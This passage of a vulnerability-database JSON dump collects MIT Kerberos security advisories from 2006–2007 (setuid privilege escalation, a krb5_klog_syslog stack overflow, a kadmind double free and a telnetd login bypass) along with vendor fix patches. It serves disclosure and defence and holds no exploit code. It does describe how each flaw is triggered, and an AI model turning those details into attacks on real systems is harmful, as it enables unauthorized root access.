FJSVmdb SUNWwbsup SUNWcar.v SUNWhea SUNWqos SUNWntpu SUNWnfsckr SUNWdtrp SUNWcpc.us SUNWpl5u SUNWlibsasl SUNWcslr SUNWippcore SUNWsshu SUNWdcsr SUNWcsu SUNWust1.v SUNWcar.u SUNWnfscu SUNWesu SUNWcsd SUNWfruip.u SUNWssad SUNWcpc.u SUNWipplr SUNWpsm-lpd SUNWuprl SUNWefc.us SUNWzoneu SUNWipplu SUNWrcapr SUNWdfbh SUNWwrsm.u SUNWftdur SUNWerid SUNWauda\") < 0)\n{\n security_message(0);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:25", "description": "telnet daemon arbitrary user logon without password, krb5_klog_syslog&#40;&#41; buffer overflow, double free&#40;&#41; vulnerability.", "cvss3": {}, "published": "2007-04-11T00:00:00", "type": "securityvulns", "title": "Mltiple MIT Kerberos security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "modified": "2007-04-11T00:00:00", "id": "SECURITYVULNS:VULN:7527", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7527", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:18", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n MIT krb5 Security Advisory 2006-001\r\n\r\nOriginal release: 2006-08-08\r\n\r\nTopic: multiple local privilege escalation vulnerabilities\r\n\r\nSeverity: serious\r\n\r\nSUMMARY\r\n=======\r\n\r\nIn certain application programs packaged in the MIT Kerberos 5 source\r\ndistribution, calls to setuid&#40;&#41; and seteuid&#40;&#41; are not always checked\r\nfor success. A local user could exploit one of these vulnerabilities\r\nto result in privilege escalation. No exploit code is known to exist\r\nat this time. It is believed that the primary risk is to Linux\r\nsystems, due to the behavior of their implementation of the setuid&#40;&#41;\r\nand seteuid&#40;&#41; system calls.\r\n\r\nIMPACT\r\n======\r\n\r\nActual impact depends on implementation details within a specific\r\noperating system. Vulnerabilities result when the OS implementations\r\nof setuid&#40;&#41; or seteuid&#40;&#41; can fail due to resource exhaustion when\r\nchanging to an unprivileged user ID. We believe that only unchecked\r\ncalls to setuid&#40;&#41;, and not calls to seteuid&#40;&#41;, are vulnerable on\r\nLinux.\r\n\r\nOn AIX, Kerberos applications provided by IBM are not vulnerable. If,\r\nin place of or in addition to IBM-provided Kerberos applications, MIT\r\nkrb5 code is installed on an AIX system, the affected MIT krb5\r\napplications are vulnerable to the setuid&#40;&#41; issues listed in\r\nCVE-2006-3083. We believe that no other operating systems are\r\naffected.\r\n\r\n[CVE-2006-3083, VU#580124] The following vulnerabilities may result\r\nfrom unchecked calls to setuid&#40;&#41;, and are believed to only exist on\r\nLinux and AIX:\r\n\r\n* Unchecked calls to setuid&#40;&#41; in krshd may allow a local privilege\r\n escalation leading to execution of programs as root.\r\n\r\n* Unchecked calls to setuid&#40;&#41; in the v4rcp may allow a local privilege\r\n escalation leading to reading, writing, or creating files as root.\r\n v4rcp is the remote end of a krb4-authenticated rcp operation, but\r\n may be executed directly by an attacker, as it is a setuid program.\r\n\r\n[CVE-2006-3084, VU#401660] The following vulnerabilities may result\r\nfrom unchecked calls to seteuid&#40;&#41;. These vulnerabilities are not yet\r\nknown to exist on any operating system:\r\n\r\n* Unchecked calls to seteuid&#40;&#41; in ftpd may allow a local privilege\r\n escalation leading to reading, writing, or creating files as root.\r\n\r\n* Unchecked calls to seteuid&#40;&#41; in the ksu program may allow a local\r\n privilege escalation resulting in filling a file with null bytes as\r\n root and then deleting it &#40;the &quot;kdestroy&quot; operation&#41;.\r\n\r\nAFFECTED SOFTWARE\r\n=================\r\n\r\n* The above-listed programs are vulnerable in all releases of MIT\r\n krb5, up to and including krb5-1.5. The krb5-1.5.1 and krb5-1.4.4\r\n releases will contain fixes for these problems.\r\n\r\nFIXES\r\n=====\r\n\r\n* The upcoming krb5-1.5.1 and krb5-1.4.4 releases will include fixes\r\n for these vulnerabilities.\r\n\r\n* Disable krshd and ftpd, and remove the setuid bit from the ksu\r\n binary and the v4rcp binary.\r\n\r\n* For the krb5-1.5 release, apply the patch at\r\n\r\n http://web.mit.edu/kerberos/advisories/2006-001-patch_1.5.txt\r\n\r\n A PGP-signed version of this patch is at\r\n\r\n http://web.mit.edu/kerberos/advisories/2006-001-patch_1.5.txt.asc\r\n\r\n This patch was generated against the krb5-1.5 release, and may apply\r\n to earlier releases with some fuzz. The patch also updates some\r\n calls to other setuid-like system calls on less-common operating\r\n systems, though these calls are less likely to be vulnerable.\r\n\r\n* For the krb5-1.4.3 release, apply the patch at\r\n\r\n http://web.mit.edu/kerberos/advisories/2006-001-patch_1.4.3.txt\r\n\r\n A PGP-signed version of this patch is at\r\n\r\n http://web.mit.edu/kerberos/advisories/2006-001-patch_1.4.3.txt\r\n\r\n This patch was generated against the krb5-1.4.3 release, and may apply\r\n to earlier releases with some fuzz. The patch also updates some\r\n calls to other setuid-like system calls on less-common operating\r\n systems, though these calls are less likely to be vulnerable.\r\n\r\nREFERENCES\r\n==========\r\n\r\nThis announcement and related security advisories may be found on the\r\nMIT Kerberos security advisory page at:\r\n\r\n http://web.mit.edu/kerberos/advisories/index.html\r\n\r\nThe main MIT Kerberos web page is at:\r\n\r\n http://web.mit.edu/kerberos/index.html\r\n\r\nCVE: CVE-2006-3083\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3083\r\n\r\nCERT: VU#580124\r\nhttp://www.kb.cert.org/vuls/id/580124\r\n\r\nCVE: CVE-2006-3084\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3084\r\n\r\nCERT: VU#401660\r\nhttp://www.kb.cert.org/vuls/id/401660\r\n\r\nACKNOWLEDGMENTS\r\n===============\r\n\r\nThanks to Michael Calmer and Marcus Meissner at SUSE for reporting\r\nthis problem.\r\n\r\nThanks to Shiva Persaud at IBM for information on AIX.\r\n\r\nDETAILS\r\n=======\r\n\r\nTypically, setuid&#40;&#41;, seteuid&#40;&#41;, and similar system calls cannot fail\r\nexcept in cases of inadequate privilege or system misconfiguration.\r\nUnlike other operating systems, Linux and AIX system calls which\r\nchange the real user ID can fail if the change would cause the target\r\nuser ID to exceed its quota of allowed processes. A local attacker\r\nmay be able to exhaust a process quota in a way which artificially\r\ncreates such a failure condition. This may result in privilege\r\nescalation when a program making an unchecked call to one of these\r\nsystem calls expects to continue execution with reduced privilege\r\nfollowing the affected call, but instead continues to run as a\r\nprivileged user.\r\n\r\nSpecific places where various system calls are not checked include:\r\n\r\nappl/bsd/krcp.c: setreuid &#40;uncompiled code&#41;, setuid &#40;irrelevant\r\n because not installed setuid&#41;\r\nappl/bsd/krshd.c: setuid\r\nappl/bsd/krsh.c: setuid &#40;irrelevant because not installed setuid&#41;\r\nappl/bsd/v4rcp.c: setuid\r\nappl/gssftp/ftpd/ftpd.c: seteuid\r\nclient/ksu/main.c: seteuid\r\nlib/krb4/kuserok.c: seteuid &#40;but likely irrelevant&#41;\r\n\r\nREVISION HISTORY\r\n================\r\n\r\n2006-08-08 original release\r\n\r\nCopyright &#40;C&#41; 2006 Massachusetts Institute of Technology\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.3 &#40;SunOS&#41;\r\n\r\niQCVAwUBRNjfg6bDgE/zdoE9AQLnKQP8DAikPgsCxRiOVj2QnX66VnBl2Nsm7irs\r\nNeO/8yiP9QpliPk4h/6p9Q1Wc70H/C4ICWgufVDiIHbnUc4MGS4GVUzZtvQelrC1\r\n4WTZyxLFfEZQzbNk6FUBw3W0P38IrUX2FQsLTp9R4S3iWFMI5Udkb5XX60zwo9w2\r\n79rpIw5g8vY=\r\n=x/vF\r\n-----END PGP SIGNATURE-----", "cvss3": {}, "published": "2006-08-09T00:00:00", "type": "securityvulns", "title": "MITKRB-SA-2006-001: multiple local privilege escalation vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2006-3083", "CVE-2006-3084"], "modified": "2006-08-09T00:00:00", "id": "SECURITYVULNS:DOC:13808", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13808", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:21", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n MIT krb5 Security Advisory 2007-002\r\n\r\nOriginal release: 2007-04-03\r\nLast update: 2007-04-03\r\n\r\nTopic: KDC, kadmind stack overflow in krb5_klog_syslog\r\n\r\nSeverity: CRITICAL\r\n\r\nCVE: CVE-2007-0957\r\nCERT: VU#704024\r\n\r\nSUMMARY\r\n=======\r\n\r\nThe library function krb5_klog_syslog&#40;&#41; can write past the end of a\r\nstack buffer. The Kerberos administration daemon &#40;kadmind&#41; as well as\r\nthe KDC, are vulnerable. Exploitation of this vulnerability is\r\nprobably simple.\r\n\r\nThis is a vulnerability in the the kadm5 library, which is used by the\r\nKDC and kadmind, and possibly by some third-party applications. It is\r\nnot a bug in the MIT krb5 protocol libraries or in the Kerberos\r\nprotocol.\r\n\r\nIMPACT\r\n======\r\n\r\nAn authenticated user may be able to cause a host running kadmind to\r\nexecute arbitrary code.\r\n\r\nAn authenticated user may be able to cause a KDC host to execute\r\narbitrary code. Also, a user controlling a Kerberos realm sharing a\r\nkey with the target realm may be able to cause a KDC host to execute\r\narbitrary code.\r\n\r\nSuccessful exploitation can compromise the Kerberos key database and\r\nhost security on the host running these programs. &#40;kadmind and the\r\nKDC typically run as root.&#41; Unsuccessful exploitation attempts will\r\nlikely result in the affected program crashing.\r\n\r\nThird-party applications which call krb5_klog_syslog&#40;&#41; may also be\r\nvulnerable.\r\n\r\nAFFECTED SOFTWARE\r\n=================\r\n\r\n* MIT krb5 releases through krb5-1.6\r\n\r\nFIXES\r\n=====\r\n\r\n* The upcoming krb5-1.6.1 release will contain a fix for this\r\n vulnerability.\r\n\r\nPrior to that release you may:\r\n\r\n* apply the patch\r\n\r\n The patch is available at\r\n\r\n http://web.mit.edu/kerberos/advisories/2007-002-patch.txt\r\n\r\n A PGP-signed patch is available at\r\n\r\n http://web.mit.edu/kerberos/advisories/2007-002-patch.txt.asc\r\n\r\n Systems which definitely provide vsnprintf&#40;&#41; may not need the entire\r\n patch; see &quot;DETAILS&quot;.\r\n\r\n Please note that releases prior to krb5-1.5 will require additional\r\n changes to the configure script src/lib/kadm5/configure in order to\r\n correctly detect the presence of vsnprintf&#40;&#41;. krb5-1.5 and later\r\n releases already check for vsnprintf&#40;&#41; in the top-level configure\r\n script, and do not have a separate src/lib/kadm5/configure script.\r\n\r\nREFERENCES\r\n==========\r\n\r\nThis announcement is posted at:\r\n\r\n http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-002-syslog.txt\r\n\r\nThis announcement and related security advisories may be found on the\r\nMIT Kerberos security advisory page at:\r\n\r\n http://web.mit.edu/kerberos/advisories/index.html\r\n\r\nThe main MIT Kerberos web page is at:\r\n\r\n http://web.mit.edu/kerberos/index.html\r\n\r\nCVE: CVE-2007-0957\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0957\r\n\r\nCERT: VU#704024\r\nhttp://www.kb.cert.org/vuls/id/704024\r\n\r\nACKNOWLEDGMENTS\r\n===============\r\n\r\nWe thank iDefense Labs for notifying us of this vulnerability.\r\niDefense credits an anonymous discoverer.\r\n\r\nDETAILS\r\n=======\r\n\r\nkrb5_klog_syslog&#40;&#41; uses vsprintf&#40;&#41; to format text into a fixed-length\r\nstack buffer. Format specifiers such as &quot;&#37;s&quot; used in calls to\r\nkrb5_klog_syslog&#40;&#41; may allow formatting of strings of sufficient\r\nlength to overwrite memory past the end of the stack buffer.\r\n\r\nCertain strings received from the client by the kadmin daemon are not\r\ntruncated prior to logging. Among these strings is the target\r\nprincipal for the kadmin operation.\r\n\r\nThe KDC truncates most client-originated strings prior to logging.\r\nOne sort of string which is not truncated is a transited-realms\r\nstring. A malicious KDC sharing a key with the target realm may issue\r\ntickets with specially-crafted transited-realms strings to exploit\r\nthis vulnerability. There are other places where an authenticated\r\nuser may cause the KDC to log a string which triggers the\r\nvulnerability.\r\n\r\nOn a system where vsnprintf&#40;&#41; is confirmed to be available, the\r\npatches to files other than src/lib/kadm5/logger.c may not be\r\nnecessary to prevent a buffer overflow; these patches are still useful\r\nto prevent malicious users from causing vsnprintf&#40;&#41; to obliterate\r\nuseful log information by means of truncation.\r\n\r\nREVISION HISTORY\r\n================\r\n\r\n2007-04-03 original release\r\n\r\nCopyright &#40;C&#41; 2007 Massachusetts Institute of Technology\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.6 &#40;SunOS&#41;\r\n\r\niQCVAwUBRhKVS6bDgE/zdoE9AQJlZgQAq/IvVdpkf3VNViwuZaAJ31+mqq17gKqX\r\n9DkxkvpPD2b5/8N/ouywP/ODCpYpT9Y+mU+Cw/hEfL2otv/o1HJcV7CXPRCEFODs\r\nYKpi2Sahcxs+jl1ZQfsY63oay6urZ0PTcrZTFQuqOv8B0wVd0XUwrSkBLejZszL3\r\nYUFR4W+wtbg=\r\n=GsBC\r\n-----END PGP SIGNATURE-----", "cvss3": {}, "published": "2007-04-04T00:00:00", "type": "securityvulns", "title": "MITKRB5-SA-2007-002: KDC, kadmind stack overflow in krb5_klog_syslog [CVE-2007-0957]", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2007-04-04T00:00:00", "id": "SECURITYVULNS:DOC:16560", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16560", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:21", "description": "Multiple Vendor Kerberos kadmind Buffer Overflow Vulnerability\r\n\r\niDefense Security Advisory 04.03.07\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nApr 03, 2007\r\n\r\nI. BACKGROUND\r\n\r\nKerberos is a network authentication protocol. It is used in\r\nclient-server systems to provide user authentication by using a ticket\r\nbased system. kadmind is the Kerberos administration server. It is used\r\nto configure principals and policies on the Kerberos. More information\r\ncan be found on the vendor&#39;s website at the following URL.\r\n\r\nhttp://web.mit.edu/Kerberos/\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of a buffer overflow vulnerability in the Kerberos\r\nkadmind server, as included in various vendors&#39; operating system\r\ndistributions, could allow attackers to execute arbitrary code on a\r\ntargeted host.\r\n\r\nThe vulnerability exists within the server&#39;s logging function,\r\nklog_vsyslog&#40;&#41;. A call is made to vsprintf&#40;&#41;, with the destination\r\nbuffer passed as a fixed size stack buffer. User input is not properly\r\nvalidated before being passed to this function, and a stack based\r\nbuffer overflow can occur.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation allows an attacker to execute arbitrary code with root\r\nprivileges on the targeted host.\r\n\r\nIn order to exploit this vulnerability, an attacker must have valid\r\ncredentials stored on the server. Administrator privileges are not\r\nnecessary. The kadmind server runs on the master Kerberos server. Since\r\nthe master server holds the KDC principal and policy database, a\r\ncompromise could lead to a compromise of multiple hosts that use the\r\nserver for authentication.\r\n\r\nIV. DETECTION\r\n\r\niDefense has confirmed the existence of this vulnerability with Kerberos\r\nversion 1.5.1 on Fedora CORE 5. It is likely that all distributions that\r\ncontain this version of Kerberos are vulnerable.\r\n\r\nV. WORKAROUND\r\n\r\niDefense is currently unaware of any workarounds for this issue.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nThe MIT Kerberos team has made patches available to address this\r\nvulnerability. For more information consult their advisory at the\r\nfollowing URL.\r\n\r\nhttp://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-002-syslog.txt\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures &#40;CVE&#41; project has assigned the\r\nname CVE-2007-0957 to this issue. This is a candidate for inclusion in\r\nthe CVE list &#40;http://cve.mitre.org/&#41;, which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n02/08/2007 Initial vendor notification\r\n02/08/2007 Initial vendor response\r\n04/03/2007 Coordinated public disclosure\r\n\r\nIX. CREDIT\r\n\r\nThe discoverer of this vulnerability wishes to remain anonymous.\r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2007 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically,\r\nplease e-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct,\r\nindirect, or consequential loss or damage arising from use of, or\r\nreliance on, this information.", "cvss3": {}, "published": "2007-04-04T00:00:00", "type": "securityvulns", "title": "iDefense Security Advisory 04.03.07: Multiple Vendor Kerberos kadmind Buffer Overflow Vulnerability", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2007-04-04T00:00:00", "id": "SECURITYVULNS:DOC:16557", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16557", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:21", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n MIT krb5 Security Advisory 2007-003\r\n\r\nOriginal release: 2007-04-03\r\nLast update: 2007-04-03\r\n\r\nTopic: double-free vulnerability in kadmind &#40;via GSS-API library&#41;\r\n\r\nSeverity: CRITICAL\r\n\r\nCVE: CVE-2007-1216\r\nCERT: VU#419344\r\n\r\nSUMMARY\r\n=======\r\n\r\nThe MIT krb5 Kerberos administration daemon &#40;kadmind&#41; is vulnerable to\r\na double-free attack in the RPCSEC_GSS authentication flavor of the\r\nRPC library, which itself results from a bug in the GSS-API library.\r\nUnder some error conditions, the krb5 GSS-API mechanism can free a\r\nbuffer which an application may then free again. This may result in\r\narbitrary code execution. Third-party applications using the GSS-API\r\nlibrary provided with MIT krb5 may also be vulnerable.\r\n\r\nExploitation of double-free bugs is believed to be difficult.\r\n\r\nThis is a bug in the GSS-API library included with MIT krb5, which is\r\nused by kadmind and by some third-party applications. It is not a bug\r\nin the Kerberos protocol.\r\n\r\nIMPACT\r\n======\r\n\r\nAn authenticated user may be able to cause a host running kadmind to\r\nexecute arbitrary code.\r\n\r\nSuccessful exploitation can compromise the Kerberos key database and\r\nhost security on the host running these programs. &#40;kadmind and the\r\nKDC typically run as root.&#41; Unsuccessful exploitation attempts will\r\nlikely result in the affected program crashing.\r\n\r\nThird-party applications calling either the RPC library or the GSS-API\r\nlibrary provided with MIT krb5 may be vulnerable.\r\n\r\nAFFECTED SOFTWARE\r\n=================\r\n\r\n* kadmind from MIT releases krb5-1.4 through krb5-1.6\r\n\r\n* third-party applications calling the RPC library included in MIT\r\n releases krb5-1.4 through krb5-1.6\r\n\r\n* kadmind and third-party applications calling the RPC library in MIT\r\n releases earlier than krb5-1.4 may not be vulnerable because the\r\n RPCSEC_GSS authentication flavor was not implemented in those RPC\r\n libraries.\r\n\r\n* third-party applications calling the GSS-API library included in any\r\n MIT krb5 releases, up to and including krb5-1.6, if the application\r\n handles GSS-API errors in a certain way\r\n\r\nFIXES\r\n=====\r\n\r\n* The upcoming krb5-1.6.1 release will contain a fix for this\r\n vulnerability.\r\n\r\nPrior to that release you may:\r\n\r\n* apply the patch\r\n\r\n Note that releases prior to krb5-1.3 will require a different patch\r\n due to an additional related vulnerability in the same file.\r\n\r\n This patch is also available at\r\n\r\n http://web.mit.edu/kerberos/advisories/2007-003-patch.txt\r\n\r\n A PGP-signed patch is available at\r\n\r\n http://web.mit.edu/kerberos/advisories/2007-003-patch.txt.asc\r\n\r\n*** src/lib/gssapi/krb5/k5unseal.c &#40;revision 19510&#41;\r\n- --- src/lib/gssapi/krb5/k5unseal.c &#40;revision 19511&#41;\r\n***************\r\n*** 457,464 ****\r\n \r\n if &#40;&#40;ctx-&gt;initiate &amp;&amp; direction != 0xff&#41; ||\r\n &#40;!ctx-&gt;initiate &amp;&amp; direction != 0&#41;&#41; {\r\n! if &#40;toktype == KG_TOK_SEAL_MSG&#41;\r\n xfree&#40;token.value&#41;;\r\n *minor_status = G_BAD_DIRECTION;\r\n return&#40;GSS_S_BAD_SIG&#41;;\r\n }\r\n- --- 457,467 ----\r\n \r\n if &#40;&#40;ctx-&gt;initiate &amp;&amp; direction != 0xff&#41; ||\r\n &#40;!ctx-&gt;initiate &amp;&amp; direction != 0&#41;&#41; {\r\n! if &#40;toktype == KG_TOK_SEAL_MSG&#41; {\r\n xfree&#40;token.value&#41;;\r\n+ message_buffer-&gt;value = NULL;\r\n+ message_buffer-&gt;length = 0;\r\n+ }\r\n *minor_status = G_BAD_DIRECTION;\r\n return&#40;GSS_S_BAD_SIG&#41;;\r\n }\r\n\r\nREFERENCES\r\n==========\r\n\r\nThis announcement is posted at:\r\n\r\n http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-003.txt\r\n\r\nThis announcement and related security advisories may be found on the\r\nMIT Kerberos security advisory page at:\r\n\r\n http://web.mit.edu/kerberos/advisories/index.html\r\n\r\nThe main MIT Kerberos web page is at:\r\n\r\n http://web.mit.edu/kerberos/index.html\r\n\r\nCVE: CVE-2007-1216\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1216\r\n\r\nCERT: VU#419344\r\nhttp://www.kb.cert.org/vuls/id/419344\r\n\r\nACKNOWLEDGMENTS\r\n===============\r\n\r\nThis bug was found while exercising the GSS-API library using the\r\nGSSTEST test program provided by SAP AG.\r\n\r\nShiva Persaud of IBM alerted us to an ambiguity in the wording of a\r\ndraft of this advisory.\r\n\r\nDETAILS\r\n=======\r\n\r\nThe kg_unseal_v1&#40;&#41; function in src/lib/gssapi/krb5/k5unseal.c frees\r\nmemory allocated for the &quot;message_buffer&quot; gss_buffer_t when it detects\r\nan invalid direction encoding on the message. It does not set the\r\npointer to NULL, nor does it set the length to zero. An application\r\nsubsequently calling gss_release_buffer&#40;&#41; on this gss_buffer_t will\r\ncause memory to be freed twice.\r\n\r\nMuch code provided with MIT krb5 does not attempt to call\r\ngss_release_buffer&#40;&#41; when gss_unseal&#40;&#41; or gss_unwrap&#40;&#41; fails, even\r\nthough the GSS-API C-bindings specification permits it to do so. The\r\nRPCSEC_GSS authentication flavor for the RPC library, introduced in\r\nkrb5-1.4, does call gss_release_buffer&#40;&#41; when gss_unwrap&#40;&#41; fails.\r\nThis allows an authenticated attacker to trigger a double-free\r\nsituation.\r\n\r\nThird-party applications calling the RPC library provided with MIT\r\nkrb5 and using the RPCSEC_GSS authentication flavor are vulnerable.\r\nThird-party applications calling the MIT GSS-API library are\r\nvulnerable if they call gss_release_buffer&#40;&#41; when they experience\r\nerrors from gss_unseal&#40;&#41; or gss_unwrap&#40;&#41;.\r\n\r\nREVISION HISTORY\r\n================\r\n\r\n2007-04-03 original release\r\n\r\nCopyright &#40;C&#41; 2007 Massachusetts Institute of Technology\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.6 &#40;SunOS&#41;\r\n\r\niQCVAwUBRhKVU6bDgE/zdoE9AQJS0gP/fieb8glCvyZHOiJkVRGGbtzzSPC2RcHN\r\nIkuF+aJo+KaKSFE+aKjce6Yx8jbOeqXx6CJe6UivGwXr1yyp31dh4B92N+3kMJlk\r\nbsNlmNJOg2iOAo+YTINokfIwsYZSWcAv1UVjhTYlev0sn9IdI/a1NNhNpIvkSDg0\r\nNdPwbLy4wi8=\r\n=MwHB\r\n-----END PGP SIGNATURE-----", "cvss3": {}, "published": "2007-04-04T00:00:00", "type": "securityvulns", "title": "MITKRB5-SA-2007-003: double-free vulnerability in kadmind &#40;via GSS-API library&#41; [CVE-2007-1216]", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2007-1216"], "modified": "2007-04-04T00:00:00", "id": "SECURITYVULNS:DOC:16559", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16559", "sourceData": "", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:21", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n MIT krb5 Security Advisory 2007-001\r\n\r\nOriginal release: 2007-04-03\r\nLast update: 2007-04-03\r\n\r\nTopic: telnetd allows login as arbitrary user\r\n\r\nSeverity: CRITICAL\r\n\r\nCVE: CVE-2007-0956\r\nCERT: VU#220816\r\n\r\nSUMMARY\r\n=======\r\n\r\nThe MIT krb5 telnet daemon &#40;telnetd&#41; allows unauthorized login as an\r\narbitrary user, when presented with a specially crafted username.\r\nExploitation of this vulnerability is trivial.\r\n\r\nThis is a vulnerability in an application program; it is not a bug in\r\nthe MIT krb5 libraries or in the Kerberos protocol.\r\n\r\nIMPACT\r\n======\r\n\r\nA user can gain unauthorized access to any account &#40;including root&#41; on\r\na host running telnetd. Whether the attacker needs to authenticate\r\ndepends on the configuration of telnetd on that host.\r\n\r\nAFFECTED SOFTWARE\r\n=================\r\n\r\n* telnetd in all releases of MIT krb5, up to and including krb5-1.6\r\n\r\nFIXES\r\n=====\r\n\r\n* The upcoming krb5-1.6.1 release will contain a fix for this\r\n vulnerability.\r\n\r\nPrior to that release you may:\r\n\r\n* disable telnetd\r\n\r\nor\r\n\r\n* apply the patch\r\n\r\n This patch is also available at\r\n\r\n http://web.mit.edu/kerberos/advisories/2007-001-patch.txt\r\n\r\n A PGP-signed patch is available at\r\n\r\n http://web.mit.edu/kerberos/advisories/2007-001-patch.txt.asc\r\n\r\n*** src/appl/telnet/telnetd/state.c &#40;revision 19480&#41;\r\n- --- src/appl/telnet/telnetd/state.c &#40;local&#41;\r\n***************\r\n*** 1665,1671 ****\r\n strcmp&#40;varp, &quot;RESOLV_HOST_CONF&quot;&#41; &amp;&amp; /* linux */\r\n strcmp&#40;varp, &quot;NLSPATH&quot;&#41; &amp;&amp; /* locale stuff */\r\n strncmp&#40;varp, &quot;LC_&quot;, strlen&#40;&quot;LC_&quot;&#41;&#41; &amp;&amp; /* locale stuff */\r\n! strcmp&#40;varp, &quot;IFS&quot;&#41;&#41; {\r\n return 1;\r\n } else {\r\n syslog&#40;LOG_INFO, &quot;Rejected the attempt to modify the environment variable &#92;&quot;&#37;s&#92;&quot;&quot;, varp&#41;;\r\n- --- 1665,1672 ----\r\n strcmp&#40;varp, &quot;RESOLV_HOST_CONF&quot;&#41; &amp;&amp; /* linux */\r\n strcmp&#40;varp, &quot;NLSPATH&quot;&#41; &amp;&amp; /* locale stuff */\r\n strncmp&#40;varp, &quot;LC_&quot;, strlen&#40;&quot;LC_&quot;&#41;&#41; &amp;&amp; /* locale stuff */\r\n! strcmp&#40;varp, &quot;IFS&quot;&#41; &amp;&amp;\r\n! !strchr&#40;varp, &#39;-&#39;&#41;&#41; {\r\n return 1;\r\n } else {\r\n syslog&#40;LOG_INFO, &quot;Rejected the attempt to modify the environment variable &#92;&quot;&#37;s&#92;&quot;&quot;, varp&#41;;\r\n*** src/appl/telnet/telnetd/sys_term.c &#40;revision 19480&#41;\r\n- --- src/appl/telnet/telnetd/sys_term.c &#40;local&#41;\r\n***************\r\n*** 1287,1292 ****\r\n- --- 1287,1302 ----\r\n #endif\r\n #if defined &#40;AUTHENTICATION&#41;\r\n if &#40;auth_level &gt;= 0 &amp;&amp; autologin == AUTH_VALID&#41; {\r\n+ if &#40;name[0] == &#39;-&#39;&#41; {\r\n+ /* Authenticated and authorized to log in to an\r\n+ account starting with &#39;-&#39;? Even if that\r\n+ unlikely case comes to pass, the current login\r\n+ program will not parse the resulting command\r\n+ line properly. */\r\n+ syslog&#40;LOG_ERR, &quot;user name cannot start with &#39;-&#39;&quot;&#41;;\r\n+ fatal&#40;net, &quot;user name cannot start with &#39;-&#39;&quot;&#41;;\r\n+ exit&#40;1&#41;;\r\n+ }\r\n # if !defined&#40;NO_LOGIN_F&#41;\r\n #if defined&#40;LOGIN_CAP_F&#41;\r\n argv = addarg&#40;argv, &quot;-F&quot;&#41;;\r\n***************\r\n*** 1377,1387 ****\r\n } else\r\n #endif\r\n if &#40;getenv&#40;&quot;USER&quot;&#41;&#41; {\r\n! argv = addarg&#40;argv, getenv&#40;&quot;USER&quot;&#41;&#41;;\r\n #if defined&#40;LOGIN_ARGS&#41; &amp;&amp; defined&#40;NO_LOGIN_P&#41;\r\n {\r\n register char **cpp;\r\n for &#40;cpp = environ; *cpp; 